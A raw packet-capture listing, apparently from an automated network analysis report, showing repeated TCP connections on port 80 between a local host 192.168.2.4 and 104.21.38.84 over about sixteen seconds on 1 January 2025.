                                                                                                                          Jan 1, 2025 04:25:07.335201025 CET8050256104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.335210085 CET5025880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.335468054 CET5025680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.339946032 CET8050258104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.693883896 CET5025880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.698708057 CET8050258104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.799101114 CET8050258104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.928033113 CET5025880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:08.059051037 CET8050258104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:08.177081108 CET5025980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:08.182889938 CET8050259104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:08.182965040 CET5025980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:08.183054924 CET5025980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:08.187906027 CET8050259104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:08.225003004 CET5025880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:08.537621975 CET5025980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:08.542516947 CET8050259104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:08.655776978 CET8050259104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:08.709445953 CET5025980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:08.921762943 CET8050259104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:08.978699923 CET5025980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.046808958 CET5025880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.049884081 CET5025980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.053725004 CET5026080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.054831028 CET8050259104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:09.055051088 CET5025980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.058610916 CET8050260104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:09.061733007 CET5026080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.061824083 CET5026080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.066596031 CET8050260104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:09.412640095 CET5026080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.417572021 CET8050260104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:09.505290031 CET8050260104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:09.631042957 CET5026080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.681806087 CET8050260104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:09.776352882 CET5026080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.802572966 CET5026080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.803375959 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.807637930 CET8050260104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:09.807686090 CET5026080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.808219910 CET8050261104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:09.808271885 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.808373928 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:09.813165903 CET8050261104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:10.162602901 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.167433023 CET8050261104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:10.252419949 CET8050261104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:10.303122997 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.516949892 CET8050261104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:10.568799973 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.603697062 CET8050261104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:10.646881104 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.723633051 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.724004984 CET5026280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.728777885 CET8050261104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:10.728890896 CET8050262104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:10.728984118 CET5026180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.728986979 CET5026280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.729085922 CET5026280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:10.733881950 CET8050262104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.087639093 CET5026280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.092713118 CET8050262104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.182140112 CET8050262104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.225075006 CET5026280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.452581882 CET8050262104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.506253958 CET5026280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.566121101 CET5026280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.566709042 CET5026380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.571177006 CET8050262104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.571254969 CET5026280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.571518898 CET8050263104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.571598053 CET5026380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.571682930 CET5026380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.576402903 CET8050263104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.850691080 CET5026380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.851633072 CET5026480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.856493950 CET8050264104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.856584072 CET5026480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.856688023 CET5026480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.861479998 CET8050264104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.895725012 CET8050263104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.943177938 CET8050263104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.943228960 CET5026380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.975605965 CET5026580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.980673075 CET8050265104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:11.980746031 CET5026580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.980879068 CET5026580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:11.985871077 CET8050265104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.209510088 CET5026480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.214428902 CET8050264104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.214555025 CET8050264104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.309353113 CET8050264104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.334594965 CET5026580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.339598894 CET8050265104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.350011110 CET5026480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.424513102 CET8050265104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.481785059 CET8050264104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.521889925 CET5026480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.521899939 CET5026580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.595565081 CET8050265104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.720455885 CET5026480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.720594883 CET5026580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.723632097 CET5026680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.725939989 CET8050264104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.726002932 CET5026480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.726464033 CET8050265104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.726527929 CET5026580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.728393078 CET8050266104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:12.728466988 CET5026680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.728684902 CET5026680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:12.733432055 CET8050266104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:13.084575891 CET5026680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:13.089487076 CET8050266104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:13.173656940 CET8050266104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:13.227633953 CET5026680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:13.357505083 CET8050266104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:13.398840904 CET5026680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:13.479156017 CET5026780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:13.484122992 CET8050267104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:13.484359026 CET5026780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:13.484481096 CET5026780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:13.489249945 CET8050267104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:13.834492922 CET5026780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:13.839427948 CET8050267104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:13.936983109 CET8050267104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:13.990642071 CET5026780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.208662033 CET8050267104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:14.256254911 CET5026780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.330151081 CET5026680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.332436085 CET5026780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.333336115 CET5026880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.337439060 CET8050267104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:14.337501049 CET5026780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.338107109 CET8050268104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:14.338171005 CET5026880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.338243961 CET5026880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.343027115 CET8050268104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:14.693972111 CET5026880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.698961020 CET8050268104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:14.790658951 CET8050268104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:14.928154945 CET5026880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:14.966845989 CET8050268104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.035393953 CET5026880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.080791950 CET5026880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.083655119 CET5026980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.085958958 CET8050268104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.087722063 CET5026880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.088500023 CET8050269104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.091767073 CET5026980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.091837883 CET5026980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.096652031 CET8050269104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.444308043 CET5026980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.449198961 CET8050269104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.560005903 CET8050269104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.600016117 CET5026980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.745719910 CET8050269104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.787512064 CET5026980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.869049072 CET5026980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.874177933 CET8050269104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.874243021 CET5026980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.875093937 CET5027080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.879918098 CET8050270104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:15.879982948 CET5027080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.880111933 CET5027080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:15.884871960 CET8050270104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:16.225132942 CET5027080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.230099916 CET8050270104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:16.328417063 CET8050270104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:16.381261110 CET5027080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.501436949 CET8050270104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:16.555641890 CET5027080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.626668930 CET5027080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.627523899 CET5027180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.631798983 CET8050270104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:16.631861925 CET5027080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.632277966 CET8050271104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:16.635720968 CET5027180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.635936975 CET5027180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.640769958 CET8050271104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:16.991616011 CET5027180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:16.996650934 CET8050271104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.081401110 CET8050271104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.131398916 CET5027180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.250612974 CET8050271104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.318814993 CET5027180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.377901077 CET5027180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.378635883 CET5027280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.382827044 CET8050271104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.382951975 CET5027180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.383454084 CET8050272104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.387703896 CET5027280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.387851954 CET5027280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.392590046 CET8050272104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.491378069 CET5027280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.492533922 CET5027380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.497392893 CET8050273104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.497452021 CET5027380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.497555971 CET5027380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.502341032 CET8050273104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.539700985 CET8050272104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.615997076 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.621011019 CET8050274104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.621073008 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.621151924 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.625945091 CET8050274104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.746001959 CET8050272104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.746041059 CET5027280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.850215912 CET5027380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.855122089 CET8050273104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.855173111 CET8050273104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.942248106 CET8050273104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.975275040 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:17.981247902 CET8050274104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:17.990658998 CET5027380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.069434881 CET8050274104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.115648031 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.201793909 CET8050273104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.240571976 CET8050274104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.257636070 CET5027380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.287606001 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.327877045 CET8050274104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.381256104 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.438380003 CET5027580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.438380003 CET5027380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.438381910 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.443331957 CET8050275104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.443510056 CET8050274104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.443715096 CET5027480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.443717957 CET5027580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.443766117 CET8050273104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.447643042 CET5027580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.447716951 CET5027380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.452416897 CET8050275104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.803271055 CET5027580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:18.808186054 CET8050275104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:18.908778906 CET8050275104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:19.097968102 CET8050275104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:19.100085974 CET5027580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:19.219966888 CET5027680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:19.224765062 CET8050276104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:19.227884054 CET5027680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:19.227884054 CET5027680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:19.232678890 CET8050276104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:19.584476948 CET5027680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:19.589387894 CET8050276104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:19.678680897 CET8050276104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:19.725025892 CET5027680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:19.938136101 CET8050276104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:19.997591019 CET5027680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.063384056 CET5027680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.064131975 CET5027780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.068523884 CET8050276104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:20.068574905 CET5027680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.068933010 CET8050277104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:20.068986893 CET5027780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.069153070 CET5027780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.073904991 CET8050277104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:20.431658983 CET5027780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.436592102 CET8050277104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:20.643428087 CET8050277104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:20.725044012 CET5027780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.798187017 CET8050277104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:20.922099113 CET5027780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.922107935 CET5027880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.926971912 CET8050278104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:20.927186012 CET8050277104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:20.927705050 CET5027780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.927707911 CET5027880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.927788019 CET5027880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:20.932533026 CET8050278104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:21.275651932 CET5027880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:21.280441999 CET8050278104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:21.369693995 CET8050278104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:21.428181887 CET5027880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:21.559011936 CET8050278104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:21.679280043 CET5027880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:21.679789066 CET5027980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:21.684326887 CET8050278104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:21.684372902 CET5027880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:21.684564114 CET8050279104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:21.684614897 CET5027980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:21.684954882 CET5027980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:21.689762115 CET8050279104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:22.129319906 CET5027980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.134154081 CET8050279104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:22.148881912 CET8050279104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:22.193778992 CET5027980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.483614922 CET8050279104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:22.539652109 CET5027980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.608501911 CET5027580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.611519098 CET5027980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.611524105 CET5028080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.616334915 CET8050280104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:22.616535902 CET8050279104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:22.616614103 CET5027980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.616615057 CET5028080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.616796970 CET5028080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.621571064 CET8050280104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:22.975115061 CET5028080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:22.979960918 CET8050280104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:23.067481041 CET8050280104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:23.117669106 CET5028080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:23.210656881 CET5028080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:23.210675001 CET5028180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:23.215645075 CET8050280104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:23.215748072 CET8050281104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:23.215787888 CET5028080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:23.215877056 CET5028180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:23.216207027 CET5028180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:23.221259117 CET8050281104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:23.330655098 CET5028280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:23.335449934 CET8050282104.21.38.84192.168.2.4
